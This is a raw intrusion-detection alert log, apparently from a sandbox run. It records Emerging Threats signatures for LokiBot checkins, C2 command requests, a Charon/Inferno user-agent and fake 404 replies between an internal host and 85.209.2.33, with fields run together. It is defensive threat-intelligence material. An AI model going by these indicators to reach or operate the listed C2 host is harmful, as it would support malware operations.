                                                            12/01/21-20:24:54.091499TCP2025381ET TROJAN LokiBot Checkin5004580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:54.091499TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004580192.168.11.2085.209.2.33
                                                            12/01/21-20:24:54.856151TCP2025483ET TROJAN LokiBot Fake 404 Response805004585.209.2.33192.168.11.20
                                                            12/01/21-20:24:55.301628TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:55.301628TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:55.301628TCP2025381ET TROJAN LokiBot Checkin5004680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:55.301628TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004680192.168.11.2085.209.2.33
                                                            12/01/21-20:24:56.133422TCP2025483ET TROJAN LokiBot Fake 404 Response805004685.209.2.33192.168.11.20
                                                            12/01/21-20:24:56.578263TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:56.578263TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:56.578263TCP2025381ET TROJAN LokiBot Checkin5004780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:56.578263TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004780192.168.11.2085.209.2.33
                                                            12/01/21-20:24:57.249300TCP2025483ET TROJAN LokiBot Fake 404 Response805004785.209.2.33192.168.11.20
                                                            12/01/21-20:24:57.685314TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:57.685314TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:57.685314TCP2025381ET TROJAN LokiBot Checkin5004880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:57.685314TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004880192.168.11.2085.209.2.33
                                                            12/01/21-20:24:58.807963TCP2025483ET TROJAN LokiBot Fake 404 Response805004885.209.2.33192.168.11.20
                                                            12/01/21-20:24:59.226466TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:59.226466TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:59.226466TCP2025381ET TROJAN LokiBot Checkin5004980192.168.11.2085.209.2.33
                                                            12/01/21-20:24:59.226466TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:00.149158TCP2025483ET TROJAN LokiBot Fake 404 Response805004985.209.2.33192.168.11.20
                                                            12/01/21-20:25:00.592886TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:00.592886TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:00.592886TCP2025381ET TROJAN LokiBot Checkin5005080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:00.592886TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:01.415238TCP2025483ET TROJAN LokiBot Fake 404 Response805005085.209.2.33192.168.11.20
                                                            12/01/21-20:25:01.864742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:01.864742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:01.864742TCP2025381ET TROJAN LokiBot Checkin5005180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:01.864742TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:02.823022TCP2025483ET TROJAN LokiBot Fake 404 Response805005185.209.2.33192.168.11.20
                                                            12/01/21-20:25:03.265287TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:03.265287TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:03.265287TCP2025381ET TROJAN LokiBot Checkin5005280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:03.265287TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:04.074222TCP2025483ET TROJAN LokiBot Fake 404 Response805005285.209.2.33192.168.11.20
                                                            12/01/21-20:25:04.503454TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:04.503454TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:04.503454TCP2025381ET TROJAN LokiBot Checkin5005380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:04.503454TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:05.176614TCP2025483ET TROJAN LokiBot Fake 404 Response805005385.209.2.33192.168.11.20
                                                            12/01/21-20:25:05.635910TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:05.635910TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:05.635910TCP2025381ET TROJAN LokiBot Checkin5005480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:05.635910TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:06.452104TCP2025483ET TROJAN LokiBot Fake 404 Response805005485.209.2.33192.168.11.20
                                                            12/01/21-20:25:06.838438TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:06.838438TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:06.838438TCP2025381ET TROJAN LokiBot Checkin5005580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:06.838438TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:07.703259TCP2025483ET TROJAN LokiBot Fake 404 Response805005585.209.2.33192.168.11.20
                                                            12/01/21-20:25:08.128585TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005680192.168.11.2085.209.2.33
                                                            12/01/21-20:25:08.128585TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005680192.168.11.2085.209.2.33
                                                            12/01/21-20:25:08.128585TCP2025381ET TROJAN LokiBot Checkin5005680192.168.11.2085.209.2.33
                                                            12/01/21-20:25:08.128585TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005680192.168.11.2085.209.2.33
                                                            12/01/21-20:25:08.986625TCP2025483ET TROJAN LokiBot Fake 404 Response805005685.209.2.33192.168.11.20
                                                            12/01/21-20:25:09.375459TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005780192.168.11.2085.209.2.33
                                                            12/01/21-20:25:09.375459TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005780192.168.11.2085.209.2.33
                                                            12/01/21-20:25:09.375459TCP2025381ET TROJAN LokiBot Checkin5005780192.168.11.2085.209.2.33
                                                            12/01/21-20:25:09.375459TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005780192.168.11.2085.209.2.33
                                                            12/01/21-20:25:10.230181TCP2025483ET TROJAN LokiBot Fake 404 Response805005785.209.2.33192.168.11.20
                                                            12/01/21-20:25:10.678495TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005880192.168.11.2085.209.2.33
                                                            12/01/21-20:25:10.678495TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005880192.168.11.2085.209.2.33
                                                            12/01/21-20:25:10.678495TCP2025381ET TROJAN LokiBot Checkin5005880192.168.11.2085.209.2.33
                                                            12/01/21-20:25:10.678495TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005880192.168.11.2085.209.2.33
                                                            12/01/21-20:25:11.355428TCP2025483ET TROJAN LokiBot Fake 404 Response805005885.209.2.33192.168.11.20
                                                            12/01/21-20:25:11.792774TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:11.792774TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:11.792774TCP2025381ET TROJAN LokiBot Checkin5005980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:11.792774TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:12.674316TCP2025483ET TROJAN LokiBot Fake 404 Response805005985.209.2.33192.168.11.20
                                                            12/01/21-20:25:13.093532TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:13.093532TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:13.093532TCP2025381ET TROJAN LokiBot Checkin5006080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:13.093532TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:13.955600TCP2025483ET TROJAN LokiBot Fake 404 Response805006085.209.2.33192.168.11.20
                                                            12/01/21-20:25:14.354397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:14.354397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:14.354397TCP2025381ET TROJAN LokiBot Checkin5006180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:14.354397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:15.204032TCP2025483ET TROJAN LokiBot Fake 404 Response805006185.209.2.33192.168.11.20
                                                            12/01/21-20:25:15.651160TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:15.651160TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:15.651160TCP2025381ET TROJAN LokiBot Checkin5006280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:15.651160TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:16.504557TCP2025483ET TROJAN LokiBot Fake 404 Response805006285.209.2.33192.168.11.20
                                                            12/01/21-20:25:16.947652TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:16.947652TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:16.947652TCP2025381ET TROJAN LokiBot Checkin5006380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:16.947652TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:17.637951TCP2025483ET TROJAN LokiBot Fake 404 Response805006385.209.2.33192.168.11.20
                                                            12/01/21-20:25:18.063186TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:18.063186TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:18.063186TCP2025381ET TROJAN LokiBot Checkin5006480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:18.063186TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:18.931400TCP2025483ET TROJAN LokiBot Fake 404 Response805006485.209.2.33192.168.11.20
                                                            12/01/21-20:25:19.363438TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:19.363438TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:19.363438TCP2025381ET TROJAN LokiBot Checkin5006580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:19.363438TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:20.229439TCP2025483ET TROJAN LokiBot Fake 404 Response805006585.209.2.33192.168.11.20
                                                            12/01/21-20:25:20.674152TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006680192.168.11.2085.209.2.33
                                                            12/01/21-20:25:20.674152TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006680192.168.11.2085.209.2.33
                                                            12/01/21-20:25:20.674152TCP2025381ET TROJAN LokiBot Checkin5006680192.168.11.2085.209.2.33
                                                            12/01/21-20:25:20.674152TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006680192.168.11.2085.209.2.33
                                                            12/01/21-20:25:21.965224TCP2025483ET TROJAN LokiBot Fake 404 Response805006685.209.2.33192.168.11.20
                                                            12/01/21-20:25:22.413712TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006780192.168.11.2085.209.2.33
                                                            12/01/21-20:25:22.413712TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006780192.168.11.2085.209.2.33
                                                            12/01/21-20:25:22.413712TCP2025381ET TROJAN LokiBot Checkin5006780192.168.11.2085.209.2.33
                                                            12/01/21-20:25:22.413712TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006780192.168.11.2085.209.2.33
                                                            12/01/21-20:25:23.268279TCP2025483ET TROJAN LokiBot Fake 404 Response805006785.209.2.33192.168.11.20
                                                            12/01/21-20:25:23.693709TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006880192.168.11.2085.209.2.33
                                                            12/01/21-20:25:23.693709TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006880192.168.11.2085.209.2.33
                                                            12/01/21-20:25:23.693709TCP2025381ET TROJAN LokiBot Checkin5006880192.168.11.2085.209.2.33
                                                            12/01/21-20:25:23.693709TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006880192.168.11.2085.209.2.33
                                                            12/01/21-20:25:24.687325TCP2025483ET TROJAN LokiBot Fake 404 Response805006885.209.2.33192.168.11.20
                                                            12/01/21-20:25:25.118211TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:25.118211TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:25.118211TCP2025381ET TROJAN LokiBot Checkin5006980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:25.118211TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:26.019312TCP2025483ET TROJAN LokiBot Fake 404 Response805006985.209.2.33192.168.11.20
                                                            12/01/21-20:25:26.457716TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:26.457716TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:26.457716TCP2025381ET TROJAN LokiBot Checkin5007080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:26.457716TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:27.291713TCP2025483ET TROJAN LokiBot Fake 404 Response805007085.209.2.33192.168.11.20
                                                            12/01/21-20:25:27.732336TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:27.732336TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:27.732336TCP2025381ET TROJAN LokiBot Checkin5007180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:27.732336TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:28.597554TCP2025483ET TROJAN LokiBot Fake 404 Response805007185.209.2.33192.168.11.20
                                                            12/01/21-20:25:29.040271TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:29.040271TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:29.040271TCP2025381ET TROJAN LokiBot Checkin5007280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:29.040271TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:29.960227TCP2025483ET TROJAN LokiBot Fake 404 Response805007285.209.2.33192.168.11.20
                                                            12/01/21-20:25:30.390268TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:30.390268TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:30.390268TCP2025381ET TROJAN LokiBot Checkin5007380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:30.390268TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:31.237351TCP2025483ET TROJAN LokiBot Fake 404 Response805007385.209.2.33192.168.11.20
                                                            12/01/21-20:25:31.672712TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:31.672712TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:31.672712TCP2025381ET TROJAN LokiBot Checkin5007480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:31.672712TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:32.537775TCP2025483ET TROJAN LokiBot Fake 404 Response805007485.209.2.33192.168.11.20
                                                            12/01/21-20:25:32.976531TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:32.976531TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:32.976531TCP2025381ET TROJAN LokiBot Checkin5007580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:32.976531TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:33.855277TCP2025483ET TROJAN LokiBot Fake 404 Response805007585.209.2.33192.168.11.20
                                                            12/01/21-20:25:34.201401TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007680192.168.11.2085.209.2.33
                                                            12/01/21-20:25:34.201401TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007680192.168.11.2085.209.2.33
                                                            12/01/21-20:25:34.201401TCP2025381ET TROJAN LokiBot Checkin5007680192.168.11.2085.209.2.33
                                                            12/01/21-20:25:34.201401TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007680192.168.11.2085.209.2.33
                                                            12/01/21-20:25:34.889352TCP2025483ET TROJAN LokiBot Fake 404 Response805007685.209.2.33192.168.11.20
                                                            12/01/21-20:25:35.299300TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007780192.168.11.2085.209.2.33
                                                            12/01/21-20:25:35.299300TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007780192.168.11.2085.209.2.33
                                                            12/01/21-20:25:35.299300TCP2025381ET TROJAN LokiBot Checkin5007780192.168.11.2085.209.2.33
                                                            12/01/21-20:25:35.299300TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007780192.168.11.2085.209.2.33
                                                            12/01/21-20:25:36.221072TCP2025483ET TROJAN LokiBot Fake 404 Response805007785.209.2.33192.168.11.20
                                                            12/01/21-20:25:36.662609TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007880192.168.11.2085.209.2.33
                                                            12/01/21-20:25:36.662609TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007880192.168.11.2085.209.2.33
                                                            12/01/21-20:25:36.662609TCP2025381ET TROJAN LokiBot Checkin5007880192.168.11.2085.209.2.33
                                                            12/01/21-20:25:36.662609TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007880192.168.11.2085.209.2.33
                                                            12/01/21-20:25:37.543295TCP2025483ET TROJAN LokiBot Fake 404 Response805007885.209.2.33192.168.11.20
                                                            12/01/21-20:25:37.981456TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:37.981456TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:37.981456TCP2025381ET TROJAN LokiBot Checkin5007980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:37.981456TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:38.681266TCP2025483ET TROJAN LokiBot Fake 404 Response805007985.209.2.33192.168.11.20
                                                            12/01/21-20:25:39.104985TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:39.104985TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:39.104985TCP2025381ET TROJAN LokiBot Checkin5008080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:39.104985TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:39.966243TCP2025483ET TROJAN LokiBot Fake 404 Response805008085.209.2.33192.168.11.20
                                                            12/01/21-20:25:40.384879TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:40.384879TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:40.384879TCP2025381ET TROJAN LokiBot Checkin5008180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:40.384879TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:41.282413TCP2025483ET TROJAN LokiBot Fake 404 Response805008185.209.2.33192.168.11.20
                                                            12/01/21-20:25:41.728532TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:41.728532TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:41.728532TCP2025381ET TROJAN LokiBot Checkin5008280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:41.728532TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:42.604213TCP2025483ET TROJAN LokiBot Fake 404 Response805008285.209.2.33192.168.11.20
                                                            12/01/21-20:25:43.040004TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:43.040004TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:43.040004TCP2025381ET TROJAN LokiBot Checkin5008380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:43.040004TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:45.344839TCP2025483ET TROJAN LokiBot Fake 404 Response805008385.209.2.33192.168.11.20
                                                            12/01/21-20:25:45.786462TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:45.786462TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:45.786462TCP2025381ET TROJAN LokiBot Checkin5008480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:45.786462TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:46.648920TCP2025483ET TROJAN LokiBot Fake 404 Response805008485.209.2.33192.168.11.20
                                                            12/01/21-20:25:47.065869TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:47.065869TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:47.065869TCP2025381ET TROJAN LokiBot Checkin5008580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:47.065869TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:48.955145TCP2025483ET TROJAN LokiBot Fake 404 Response805008585.209.2.33192.168.11.20
                                                            12/01/21-20:25:49.333248TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008680192.168.11.2085.209.2.33
                                                            12/01/21-20:25:49.333248TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008680192.168.11.2085.209.2.33
                                                            12/01/21-20:25:49.333248TCP2025381ET TROJAN LokiBot Checkin5008680192.168.11.2085.209.2.33
                                                            12/01/21-20:25:49.333248TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008680192.168.11.2085.209.2.33
                                                            12/01/21-20:25:50.156226TCP2025483ET TROJAN LokiBot Fake 404 Response805008685.209.2.33192.168.11.20
                                                            12/01/21-20:25:50.543760TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008780192.168.11.2085.209.2.33
                                                            12/01/21-20:25:50.543760TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008780192.168.11.2085.209.2.33
                                                            12/01/21-20:25:50.543760TCP2025381ET TROJAN LokiBot Checkin5008780192.168.11.2085.209.2.33
                                                            12/01/21-20:25:50.543760TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008780192.168.11.2085.209.2.33
                                                            12/01/21-20:25:51.225122TCP2025483ET TROJAN LokiBot Fake 404 Response805008785.209.2.33192.168.11.20
                                                            12/01/21-20:25:51.643095TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008880192.168.11.2085.209.2.33
                                                            12/01/21-20:25:51.643095TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008880192.168.11.2085.209.2.33
                                                            12/01/21-20:25:51.643095TCP2025381ET TROJAN LokiBot Checkin5008880192.168.11.2085.209.2.33
                                                            12/01/21-20:25:51.643095TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008880192.168.11.2085.209.2.33
                                                            12/01/21-20:25:52.315130TCP2025483ET TROJAN LokiBot Fake 404 Response805008885.209.2.33192.168.11.20
                                                            12/01/21-20:25:52.728324TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:52.728324TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:52.728324TCP2025381ET TROJAN LokiBot Checkin5008980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:52.728324TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008980192.168.11.2085.209.2.33
                                                            12/01/21-20:25:53.432879TCP2025483ET TROJAN LokiBot Fake 404 Response805008985.209.2.33192.168.11.20
                                                            12/01/21-20:25:53.873349TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:53.873349TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:53.873349TCP2025381ET TROJAN LokiBot Checkin5009080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:53.873349TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009080192.168.11.2085.209.2.33
                                                            12/01/21-20:25:54.575483TCP2025483ET TROJAN LokiBot Fake 404 Response805009085.209.2.33192.168.11.20
                                                            12/01/21-20:25:54.977073TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:54.977073TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:54.977073TCP2025381ET TROJAN LokiBot Checkin5009180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:54.977073TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009180192.168.11.2085.209.2.33
                                                            12/01/21-20:25:55.682821TCP2025483ET TROJAN LokiBot Fake 404 Response805009185.209.2.33192.168.11.20
